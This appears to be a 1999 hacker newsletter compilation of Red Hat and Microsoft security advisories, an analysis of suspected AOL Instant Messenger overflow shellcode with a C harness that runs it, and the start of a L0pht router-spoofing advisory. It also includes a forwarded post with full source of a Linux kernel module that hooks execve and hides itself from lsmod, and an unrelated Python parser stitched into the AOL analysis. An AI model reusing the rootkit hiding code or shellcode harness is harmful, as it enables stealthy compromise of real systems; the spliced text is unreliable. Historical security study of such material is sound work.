If you need to take action, you should apply the re-released patches for either the "Malformed HTTP Request Header" or "Double Byte Code Page" vulnerabilities. Applying either of the patches will correct the error. It's not necessary to "back out" either of the original patches; just download the new version of either patch and install it.
Obtaining Support on this Issue
===============================

This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp.

---------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.

*******************************************************************

You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM. The subject line and message body are not used in processing the request, and can be anything you like.

For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

66.0 RHSA:Denial of service attack in in.telnetd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---------------------------------------------------------------------
                   Red Hat, Inc.
                   Security Advisory

Synopsis:          Denial of service attack in in.telnetd
Advisory ID:       RHSA-1999:029-01
Issue date:        1999-08-19
Updated on:
Keywords:          telnet telnetd
Cross references:
---------------------------------------------------------------------

1. Topic:

A denial of service attack has been fixed in in.telnetd.

2. Bug IDs fixed (http://developer.redhat.com/bugzilla/):

4560

3. Relevant releases/architectures:

Red Hat Linux 4.2, 5.2, 6.0, all architectures

4. Obsoleted by:

5. Conflicts with:

6. RPMs required:

Red Hat Linux 4.2:

Intel:
ftp://ftp.redhat.com/redhat/updates/4.2/i386/NetKit-B-0.09-11.i386.rpm

Alpha:
ftp://ftp.redhat.com/redhat/updates/4.2/alpha/NetKit-B-0.09-11.alpha.rpm

Sparc:
ftp://ftp.redhat.com/redhat/updates/4.2/sparc/NetKit-B-0.09-11.sparc.rpm

Source packages:
ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/NetKit-B-0.09-11.src.rpm

Red Hat Linux 5.2:

Intel:
ftp://ftp.redhat.com/redhat/updates/5.2/i386/telnet-0.10-28.5.2.i386.rpm

Alpha:
ftp://ftp.redhat.com/redhat/updates/5.2/alpha/telnet-0.10-28.5.2.alpha.rpm

Sparc:
ftp://ftp.redhat.com/redhat/updates/5.2/sparc/telnet-0.10-28.5.2.sparc.rpm

Source packages:
ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/telnet-0.10-28.5.2.src.rpm

Red Hat Linux 6.0:

Intel:
ftp://ftp.redhat.com/redhat/updates/6.0/i386/telnet-0.10-29.i386.rpm

Alpha:
ftp://ftp.redhat.com/redhat/updates/6.0/alpha/telnet-0.10-29.alpha.rpm

Sparc:
ftp://ftp.redhat.com/redhat/updates/6.0/sparc/telnet-0.10-29.sparc.rpm

Source packages:
ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/telnet-0.10-29.src.rpm

7. Problem description:

in.telnetd attempts to negotiate a compatible terminal type between the local and remote host. By setting the TERM environment variable before connecting, a remote user could cause the system telnetd to open files it should not. Depending on the TERM setting used, this could lead to denial of service attacks.

Thanks go to Michal Zalewski and the Linux Security Audit team for noting this vulnerability.

8. Solution:

For each RPM for your particular architecture, run:

rpm -Uvh <filename>

where filename is the name of the RPM.

9. Verification:

MD5 sum                          Package Name
--------------------------------------------------------------------------
0c425c34fb77a8309ff10b4143e9b847 i386/NetKit-B-0.09-11.i386.rpm
d791d645adeb5fa0147c1058b21cbbac alpha/NetKit-B-0.09-11.alpha.rpm
bfbd440845191bbdcf8be21ee59bf6a8 sparc/NetKit-B-0.09-11.sparc.rpm
ccd5ab53c423e468d66ca801c90b5ae4 SRPMS/NetKit-B-0.09-11.src.rpm
ef33f3c5ca810d05420e57b5cfcf8928 i386/telnet-0.10-28.5.2.i386.rpm
6dc23437a200193b0bfed23d5f5e6562 alpha/telnet-0.10-28.5.2.alpha.rpm
49c38457cc0a82a680fd9b9634dc8021 sparc/telnet-0.10-28.5.2.sparc.rpm
2f33670a683e3abef0e4914586c71961 SRPMS/telnet-0.10-28.5.2.src.rpm
4360d47490f13d60b8737d28dc88825a i386/telnet-0.10-29.i386.rpm
90213fcdca41a3ed12ab7d92344e7286 alpha/telnet-0.10-29.alpha.rpm
277787dbc39dff8ea84d4b16dcb7a954 sparc/telnet-0.10-29.sparc.rpm
269783a0754d234f7bef0f4717a8dbc2 SRPMS/telnet-0.10-29.src.rpm

These packages are PGP signed by Red Hat Inc. for security. Our key is available at:

http://www.redhat.com/corp/contact.html

You can verify each package with the following command:

rpm --checksig <filename>

If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command:

rpm --checksig --nopgp <filename>

10. References:

@HWA

67.0 [EuroHaCk] stealth-code
~~~~~~~~~~~~~~~~~~~~~~~

---------- Forwarded message ----------
Date: Wed, 18 Aug 1999 18:56:09 +0200
From: Martin Markovitz
Reply-To: eurohack@bofh.kyrnet.kg
To: coders@dione.ids.pl
Subject: [EuroHaCk] stealth-code

hi,

don't think that hiding modules is an old topic. ;-) since all the other dirty tricks didn't work on 2.2 kernel (as using asm-code etc.) i used new technique to hide modules. example-code below. payload is simply print-out-message-at-execution-call thingie. this module even is stealth enuff ;-) for my radar.c module-detector. any other suggestions are welcome.
cheers,
Stealth

: ---- main(){fork();main();} ----
: Hi! I'm a .signature virus! Copy me into your ~/.signature, please!
: Stealth <-> http://www.kalug.lug.net/stealth

/*** A kernel-module for 2.2 kernels, hiding itself.
 *** It was easier in 2.0 kernels and i found all the old
 *** techniques not to work. So i invented new one. ;-)
 *** (C) 1999/2000 by Stealth.
 *** All under the GPL. SO YOU USE IT AT YOUR OWN RISK.
 *** http://www.kalug.lug.net/stealth
 ***
 *** Greets to all my friends, you know who you are.
 ***/

#define __KERNEL__
#define MODULE

#include
#include
#include
#include
#include
#include
#include
#include

#ifndef NULL
#define NULL ((void*)0)
#endif

extern void *sys_call_table[];

int (*old_exec)(struct pt_regs regs);

int new_exec(struct pt_regs regs)
{
        int error = 0;
        char *filename;

        lock_kernel();
        filename = getname((char*)regs.ebx);
        error = PTR_ERR(filename);
        if (IS_ERR(error))
                goto out;
        printk("Hi, the hook is still installed. ;-)\n");
        error = do_execve(filename, (char**)regs.ecx, (char**)regs.edx, &regs);
        putname(filename);
out:
        unlock_kernel();
        return error;
}

int init_module()
{
        int i = 0;
        struct module *m = &__this_module, *lastm = NULL, *to_delete = NULL;

        EXPORT_NO_SYMBOLS;

        /* install hook */
        old_exec = sys_call_table[__NR_execve];
        sys_call_table[__NR_execve] = new_exec;

        /* get next module-struct */
        to_delete = m->next;
        if (!to_delete) {
                printk("No module found for exchange }|-(\n");
                return 0;
        }

        /* and steal all information about it */
        m->name = to_delete->name;
        m->size = to_delete->size;
        m->flags = to_delete->flags;

        /* even set the right USE_COUNT */
        for (i = 0; i < GET_USE_COUNT(to_delete); i++)
                MOD_INC_USE_COUNT;

        /* and drop the attacked module from the list
         * this won't delete it but makes it disappear for lsmod */
        m->next = to_delete->next;

        printk("The following modules are visible now:\n");
        while (m) {
                printk("%s\n", m->name);
                m = m->next;
        }
        printk("Tzzz... (sleeping)\n");
        return 0;
}

int cleanup_module()
{
        sys_call_table[__NR_execve] = old_exec;
        return 0;
}

@HWA

68.0 RHSA;Buffer overflow in libtermcap tgetent()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---------------------------------------------------------------------
                   Red Hat, Inc.
                   Security Advisory

Synopsis:          Buffer overflow in libtermcap tgetent()
Advisory ID:       RHSA-1999:028-01
Issue date:        1999-08-17
Updated on:
Keywords:          termcap xterm
Cross references:
---------------------------------------------------------------------

1. Topic:

A buffer overflow has been fixed in the tgetent() function of libtermcap.

2. Bug IDs fixed (http://developer.redhat.com/bugzilla/):

4538

3. Relevant releases/architectures:

Red Hat Linux 4.2, 5.2, 6.0, all architectures

4. Obsoleted by:

5. Conflicts with:

6. RPMs required:

Red Hat Linux 4.2:

Intel:
ftp://ftp.redhat.com/redhat/updates/4.2/i386/libtermcap-2.0.8-14.4.2.i386.rpm
ftp://ftp.redhat.com/redhat/updates/4.2/i386/libtermcap-devel-2.0.8-14.4.2.i386.rpm

Alpha:
ftp://ftp.redhat.com/redhat/updates/4.2/alpha/libtermcap-2.0.8-14.4.2.alpha.rpm
ftp://ftp.redhat.com/redhat/updates/4.2/alpha/libtermcap-devel-2.0.8-14.4.2.alpha.rpm

Sparc:
ftp://ftp.redhat.com/redhat/updates/4.2/sparc/libtermcap-2.0.8-14.4.2.sparc.rpm
ftp://ftp.redhat.com/redhat/updates/4.2/sparc/libtermcap-devel-2.0.8-14.4.2.sparc.rpm

Source packages:
ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/libtermcap-2.0.8-14.4.2.src.rpm

Red Hat Linux 5.2:

Intel:
ftp://ftp.redhat.com/redhat/updates/5.2/i386/libtermcap-2.0.8-14.5.2.i386.rpm
ftp://ftp.redhat.com/redhat/updates/5.2/i386/libtermcap-devel-2.0.8-14.5.2.i386.rpm

Alpha:
ftp://ftp.redhat.com/redhat/updates/5.2/alpha/libtermcap-2.0.8-14.5.2.alpha.rpm
ftp://ftp.redhat.com/redhat/updates/5.2/alpha/libtermcap-devel-2.0.8-14.5.2.alpha.rpm

Sparc:
ftp://ftp.redhat.com/redhat/updates/5.2/sparc/libtermcap-2.0.8-14.5.2.sparc.rpm
ftp://ftp.redhat.com/redhat/updates/5.2/sparc/libtermcap-devel-2.0.8-14.5.2.sparc.rpm

Source packages:
ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/libtermcap-2.0.8-14.5.2.src.rpm

Red Hat Linux 6.0:

Intel:
ftp://ftp.redhat.com/redhat/updates/6.0/i386/libtermcap-2.0.8-15.i386.rpm
ftp://ftp.redhat.com/redhat/updates/6.0/i386/libtermcap-devel-2.0.8-15.i386.rpm

Alpha:
ftp://ftp.redhat.com/redhat/updates/6.0/alpha/libtermcap-2.0.8-15.alpha.rpm
ftp://ftp.redhat.com/redhat/updates/6.0/alpha/libtermcap-devel-2.0.8-15.alpha.rpm

Sparc:
ftp://ftp.redhat.com/redhat/updates/6.0/sparc/libtermcap-2.0.8-15.sparc.rpm
ftp://ftp.redhat.com/redhat/updates/6.0/sparc/libtermcap-devel-2.0.8-15.sparc.rpm

Source packages:
ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/libtermcap-2.0.8-15.src.rpm

7. Problem description:

A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Under Red Hat Linux 5.2 and 4.2, this could lead to local users gaining root privileges, as xterm (as well as other possibly setuid programs) are linked against libtermcap. Under Red Hat Linux 6.0, xterm is not setuid root.

Thanks go to Kevin Vajk and the Linux Security Audit team for noting and providing a fix for this vulnerability.

8. Solution:

For each RPM for your particular architecture, run:

rpm -Uvh <filename>

where filename is the name of the RPM.

9. Verification:

MD5 sum                          Package Name
--------------------------------------------------------------------------
31b5612edbb97c66600ac65c81c85fc2 i386/libtermcap-2.0.8-14.4.2.i386.rpm
8c26efd7648e92f23e9d2b5e7f48d3a4 i386/libtermcap-devel-2.0.8-14.4.2.i386.rpm
e6a3cb5ad06d6b64a40321b01d18931b alpha/libtermcap-2.0.8-14.4.2.alpha.rpm
15c288bd178504542be3b2cee077713a alpha/libtermcap-devel-2.0.8-14.4.2.alpha.rpm
8fb7ce4743c14b4163c4871dada51b63 sparc/libtermcap-2.0.8-14.4.2.sparc.rpm
bc7a74a44201b37fa6cf3515bd20a2bd sparc/libtermcap-devel-2.0.8-14.4.2.sparc.rpm
eb117c8f9f926b7fe75f6ebbdf3d2a6b SRPMS/libtermcap-2.0.8-14.4.2.src.rpm
9811a7c7665a18a46e9c876163628ba6 i386/libtermcap-2.0.8-14.5.2.i386.rpm
91248a539ee5fb708d194403c61ee14c i386/libtermcap-devel-2.0.8-14.5.2.i386.rpm
50a9dcb2fea451b03b743c46ea478418 alpha/libtermcap-2.0.8-14.5.2.alpha.rpm
a98bbcd7a3e8ab0b41983318aea5e919 alpha/libtermcap-devel-2.0.8-14.5.2.alpha.rpm
4c2f8d832512fabbe5dbcb89fc782159 sparc/libtermcap-2.0.8-14.5.2.sparc.rpm
b65b6267eed90d8149a9e52462b3cf10 sparc/libtermcap-devel-2.0.8-14.5.2.sparc.rpm
19caa6ab708d3a3f6af8eddafb5f53f2 SRPMS/libtermcap-2.0.8-14.5.2.src.rpm
4995cf0a7c181abe56565d82f12c7819 i386/libtermcap-2.0.8-15.i386.rpm
59d18de3f22abe5674575961b1390177 i386/libtermcap-devel-2.0.8-15.i386.rpm
611cdfb7f167242e7d3b2eaac866705a alpha/libtermcap-2.0.8-15.alpha.rpm
76098235237b5f051ad1266193d7b259 alpha/libtermcap-devel-2.0.8-15.alpha.rpm
846ad7a73b25d3eceab1949322337e14 sparc/libtermcap-2.0.8-15.sparc.rpm
6ddde808ec8b5bc7960851ef3188a6dd sparc/libtermcap-devel-2.0.8-15.sparc.rpm
6a29851494601540d642ff557bd590d6 SRPMS/libtermcap-2.0.8-15.src.rpm

These packages are PGP signed by Red Hat Inc. for security.
Our key is available at:

http://www.redhat.com/corp/contact.html

You can verify each package with the following command:

rpm --checksig <filename>

If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command:

rpm --checksig --nopgp <filename>

10. References:

@HWA

69.0 Possible AOL IM buffer overflow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
Possible Buffer Overflow in AOL Instant Messenger
------------------------------------------------------------
Robert Graham
http://www.robertgraham.com/pubs/aol-exploit/

It appears to me that AOL might be running a buffer-overflow exploit against their own clients.

BEFORE DOING ANYTHING ELSE: log onto AOL Instant Messaging and take a trace of it with NetMon/tcpdump/Sniffer/etc. If this is really happening, then AOL will likely fix it soon.

DETAILS
------------------------------------------------------------

Last Friday I read the following in the NYTimes:
http://www.nytimes.com/library/tech/99/08/biztech/articles/13soft.html

This story brings up the implication that America Online might be running a "buffer-overflow exploit" on its own users. They have already made 13 changes to their server code in the past few weeks in order to stop Microsoft's clones from working, so this may be yet another attempt.

According to what I see, it appears to me that this implication is correct. I see something that looks a lot like a buffer overflow exploit when sniffing the connection between the client and AOL's servers. You can reproduce this yourself:

1. log onto AOL Instant Messenger with the latest client that comes with Communicator version WIN32 2.0.912, aka 2.0N. (Click on [File/Help/Report a bug] to get the real version).
2. take a packet trace of the login procedures (I use NetMon).
3. look for the frame that I describe below.
4. copy/paste the frame data into the C program as I demonstrate below.
5. step through the code in the debugger and disassemble it

THE PACKET
------------------------------------------------------------

AOL has removed their documentation from the Internet recently. I had to download the GAIM (AIM client for Linux) source code to figure things out.

A TCP connection is used. The format for each request/response in the login process is:

byte[0] = 0x2a
byte[1] = 0x02 (type = 2 = login)
byte[2-3] = sequence number
byte[4-5] = length
byte[6-7] = type
byte[8-9] = subtype

However, multiple requests/responses can be queued into a single packet. Following is the entire TCP packet I received from the AOL server to my client:

00000000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E.
00000010 01 90 35 2A 40 00 7F 06 AF 73 0A 00 00 02 0A 00 ..5*@...s......
00000020 01 C9 04 38 0D 7F 25 F8 E3 A3 0C 19 A5 14 50 18 ...8.%.......P.
00000030 6E B5 4C E2 00 00/2A 02 31 F8 00 0C 00 0B 00 02 n.L...*.1.......
00000040 00 00 80 A2 F1 D5 04 B0/2A 02 31 F9 01 28 00 01 ........*.1..(..
00000050 00 13 00 00 80 A2 F1 D6 00 FF 00 0B 01 18*83*C4 ................
00000060 10 4F 8D 94 24 E4 FE FF FF 8B EC 03 AA F8 00 00 .O..$...........
00000070 00 90 90 90 90 8B 82 F0 00 00 00 8B 00 89 82 4E ...............N
00000080 00 00 00 8B 4D 04 03 8A F4 00 00 00 8D 82 42 00 ....M.........B.
00000090 00 00 89 45 10 B8 10 00 00 00 89 45 0C C9 FF E1 ...E.......E....
000000A0 00 01 00 20 00 00 00 00 00 00 00 04 00 00 00 00 ................
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000120  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000130  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000140  00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 10  ................
00000150  08 11 29 EC FF FF 44 00 00 00 00 00 00 00 FF 00  ..)...D.........
00000160  00 00 08 01 00 00 00 00 00 00 90 47 40 00 F8*E9*  ...........G@...
00000170  EA FE FF FF 00 00/2A 02 31 FA 00 22 00 01 00 13  ......*.1..".... 
00000180  00 00 80 A2 F1 D7 00 04 00 0B 00 12 68 74 74 70  ............http
00000190  3A 2F 2F 77 77 77 2E 61 6F 6C 2E 63 6F 6D        ://www.aol.com

There are three AIM segments in this packet, which I've marked with
slashes in the above decode. (Remember that TCP is a stream based
protocol, so application protocols have to figure out their own
boundaries, and you often see multiple segments in a single TCP packet).

The second segment is of interest here, as marked by the slashes. It
seems like the first byte of the embedded code starts at the byte with
the value 0x83 at offset 0x53. However, this isn't the buffer overflow,
but the start of the buffer itself. Immediately preceding this is what
appears to be a length field. I'm thinking they only allow for a max
length of 256 (0x100), but the length field has an extra 0x18 bytes. So
if we go 256 bytes into the buffer, we get some more stuff that looks
like code. I haven't analyzed all this stuff, but it appears that at the
end of the overflow section, it jumps back to the start of the buffer
that contains the code of the exploit. [You only get so much wriggle
room where you overflow, because the more you overflow, the more of the
stack you overwrite; so the overflowed section has to be as small as
possible, and jump backwards to actually run something].

THE DECODE
------------------------------------------------------------

In this section, I have done a decode of all the bytes in the segment.
To the left are the original bytes, to the right is either the protocol
interpretation or the disassembled output. These bytes are in the same
order as in the original packet.

2A 02                            parse of logon sequence
31 F9                            sequence number
01 28                            length of this segment
00 01 00 13                      type/subtype field of this packet
00 00 80 A2 F1 D6 00 FF 00 0B    unknown data
01 18                            length of data field
83 C4 10                         add esp,10h
4F                               dec edi
8D 94 24 E4 FE FF FF             lea edx,dword ptr [esp-11Ch]
8B EC                            mov ebp,esp
03 AA F8 00 00 00                add ebp,dword ptr [edx+0F8h]
90                               nop
90                               nop
90                               nop
90                               nop
8B 82 F0 00 00 00                mov eax,dword ptr [edx+0F0h]
8B 00                            mov eax,dword ptr [eax]
89 82 4E 00 00 00                mov dword ptr [edx+4Eh],eax
8B 4D 04                         mov ecx,dword ptr [ebp+4]
03 8A F4 00 00 00                add ecx,dword ptr [edx+0F4h]
8D 82 42 00 00 00                lea eax,dword ptr [edx+42h]
89 45 10                         mov dword ptr [ebp+10h],eax
B8 10 00 00 00                   mov eax,10h
89 45 0C                         mov dword ptr [ebp+0Ch],eax
C9                               leave
FF E1                            jmp ecx
00 01 00 20 00 00 00 00 00 00 00 04 00 00 00 00   filler
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   block
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   that
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   doesn't
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   mean
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   much
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 10   start of
08 11 29 EC FF FF 44 00 00 00 00 00 00 00 FF 00   overflow
00 00 08 01 00 00 00 00 00 00 90 47 40 00         jump address?
F8                               unknown
E9 EA FE FF FF                   jmp back_to_start_of_buffer
00 00

You'll notice that there appears to be other code that I haven't
disassembled. I would have to second-guess the original source, and I
don't quite feel like it.

How to disassemble this? The easiest way is simply to paste the data
bytes into a program and RUN the code.
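The framing described above (0x2a, type, 16-bit sequence number, 16-bit length, then for the login frames a type/subtype, ten unknown bytes and a 16-bit data length) is enough to split the captured TCP payload into its three segments mechanically and to spot the over-long data field without a debugger. The following parser is an added example and not code from the article: the frame headers and 16-byte prefixes are copied from the dump, the 280-byte body of the second frame is filled with placeholder bytes because only its length matters, and the 256-byte limit is the article's suspicion, not a documented value.

```python
"""Parse the AIM login framing described above and flag over-long data fields.

Added example, not code from Robert Graham's article: it applies the
6-byte frame header the article gives (0x2a, type, 16-bit sequence
number, 16-bit length), then, for frames long enough to carry it, the
article's type/subtype + 10 unknown bytes + 16-bit data length prefix,
and reports any data field longer than the 256-byte buffer the article
suspects the client allocates.
"""
import struct

FRAME_START = 0x2A
PREFIX_LEN = 16          # type(2) subtype(2) unknown(10) data-length(2), as decoded above
SUSPECTED_MAX_DATA = 0x100


def build_sample_stream():
    """Constructed TCP payload. The three frame headers and the 16-byte
    prefixes are copied from the dump above; the 280-byte body of the
    second frame is placeholder NOPs, since only its length matters here."""
    seg1 = bytes.fromhex("2a0231f8000c") + bytes.fromhex("000b0002000080a2f1d504b0")
    seg2 = (bytes.fromhex("2a0231f90128")
            + bytes.fromhex("00010013000080a2f1d600ff000b0118")
            + b"\x90" * 0x118)
    seg3 = (bytes.fromhex("2a0231fa0022")
            + bytes.fromhex("00010013000080a2f1d70004000b0012")
            + b"http://www.aol.com")
    return seg1 + seg2 + seg3


def parse_frames(stream):
    """Split a TCP payload into frames. Raises ValueError on a bad start
    byte or a frame whose length field runs past the data we have."""
    frames = []
    off = 0
    while off < len(stream):
        if len(stream) - off < 6:
            raise ValueError("truncated frame header at offset %d" % off)
        start, ftype, seq, length = struct.unpack_from(">BBHH", stream, off)
        if start != FRAME_START:
            raise ValueError("bad start byte 0x%02x at offset %d" % (start, off))
        body = stream[off + 6:off + 6 + length]
        if len(body) != length:
            raise ValueError("frame 0x%04x claims %d bytes, only %d present"
                             % (seq, length, len(body)))
        frames.append({"offset": off, "type": ftype, "seq": seq,
                       "length": length, "body": body})
        off += 6 + length
    return frames


def check_data_fields(frames, max_data=SUSPECTED_MAX_DATA):
    """Return (seq, data_len, reason) for every frame whose data field is
    inconsistent with the frame length or exceeds max_data."""
    findings = []
    for f in frames:
        body = f["body"]
        if len(body) < PREFIX_LEN:
            continue                    # e.g. the 12-byte first frame
        (data_len,) = struct.unpack_from(">H", body, PREFIX_LEN - 2)
        if data_len != len(body) - PREFIX_LEN:
            findings.append((f["seq"], data_len, "length mismatch"))
        elif data_len > max_data:
            findings.append((f["seq"], data_len,
                             "data field exceeds %d bytes" % max_data))
    return findings


if __name__ == "__main__":
    frames = parse_frames(build_sample_stream())
    for f in frames:
        print("frame seq=0x%04x type=%d len=%d" % (f["seq"], f["type"], f["length"]))
    print(check_data_fields(frames))
```

Run stand-alone it lists the three frames (sequence numbers 0x31F8, 0x31F9, 0x31FA with lengths 12, 296 and 34) and reports only the second one, whose 0x118-byte data field is the one the article singles out; a frame whose length field overruns the captured bytes is rejected rather than silently truncated, which is the check a client parser would need.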
In theory, you could create a sample program that would actually run
this code completely without crashing but that would take A LOT of
effort.

THE CODE TO TEST IT
------------------------------------------------------------
*/

/* The data from the packet, starting at where I believe the data field
 * begins. */
unsigned char packet[] = {
   0x83, 0xC4, 0x10, 0x4F, 0x8D, 0x94, 0x24, 0xE4, 0xFE, 0xFF, 0xFF, 0x8B, 0xEC, 0x03, 0xAA, 0xF8,
   0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x8B, 0x82, 0xF0, 0x00, 0x00, 0x00, 0x8B, 0x00, 0x89,
   0x82, 0x4E, 0x00, 0x00, 0x00, 0x8B, 0x4D, 0x04, 0x03, 0x8A, 0xF4, 0x00, 0x00, 0x00, 0x8D, 0x82,
   0x42, 0x00, 0x00, 0x00, 0x89, 0x45, 0x10, 0xB8, 0x10, 0x00, 0x00, 0x00, 0x89, 0x45, 0x0C, 0xC9,
   0xFF, 0xE1, 0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0x19, 0x10, 0x08, 0x11, 0x29, 0xEC, 0xFF, 0xFF, 0x44, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
   0xFF, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x47, 0x40, 0x00,
   0xF8, 0xE9, 0xEA, 0xFE, 0xFF, 0xFF, 0x00, 0x00, 0x2A, 0x02, 0x31, 0xFA, 0x00, 0x22, 0x00, 0x01,
   0x00, 0x13, 0x00, 0x00, 0x80, 0xA2, 0xF1, 0xD7, 0x00, 0x04, 0x00, 0x0B, 0x00, 0x12, 0x68, 0x74,
   0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x61, 0x6F, 0x6C, 0x2E, 0x63, 0x6F, 0x6D
};

/* Function pointer that will point to the buffer above */
void (*foo)();

int main()
{
   /* Set to the point where it overflows (256 characters in),
    * then add an offset to the jmp instruction that jumps back
    * to the beginning. The cast is needed for the assignment to compile. */
   foo = (void (*)())(packet + 256 + 0x11);

   /* In MS DevStudio, put a break point here, and then turn on
    * disassembly mode [View/Debug Windows/Disassembly]. This will
    * allow you to single step each assembly instruction, and will
    * disassemble them for you. Also, turn on view of the original
    * bytes by right-hand-mouse-clicking on the disassembly and
    * selecting [Code Bytes]. */
   foo();
   return 0;
}

@HWA

70.0 L0pht security advisory: Attackers can remotely add default route entries
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[begin]--

L0pht Security Advisory

Release date: August 11, 1999
Vulnerable:   Microsoft Windows95a (w/winsock2), Windows95b, Windows98,
              Windows98se and Sun Microsystems SunOS & Solaris operating
              systems.
Severity:     Attackers can remotely add default route entries on the
              victim's host.
Status:       Microsoft contacted, fix provided.
Author:       sili@l0pht.com
URL:          http://www.L0pht.com/advisories.html
Source code:  http://www.l0pht.com/advisories/rdp.tar.gz
              code written by Silicosis & Mudge

I. Problem
----------

The ICMP Router Discovery Protocol (IRDP) comes enabled by default on
DHCP clients that are running Microsoft Windows95 (w/winsock2),
Windows95b, Windows98, Windows98se, and Windows2000 machines. By
spoofing IRDP Router Advertisements, an attacker can remotely add
default route entries on a remote system. The default route entry added
by the attacker will be preferred over the default route obtained from
the DHCP server.
While Windows2000 does indeed have IRDP enabled by default, it is less
vulnerable as it is impossible to give it a route that is preferred over
the default route obtained via DHCP.

SunOS systems will also intentionally use IRDP under specific
conditions. For Solaris2.6, the IRDP daemon, in.rdisc, will be started
if the following conditions are met:

  . The system is a host, not a router.
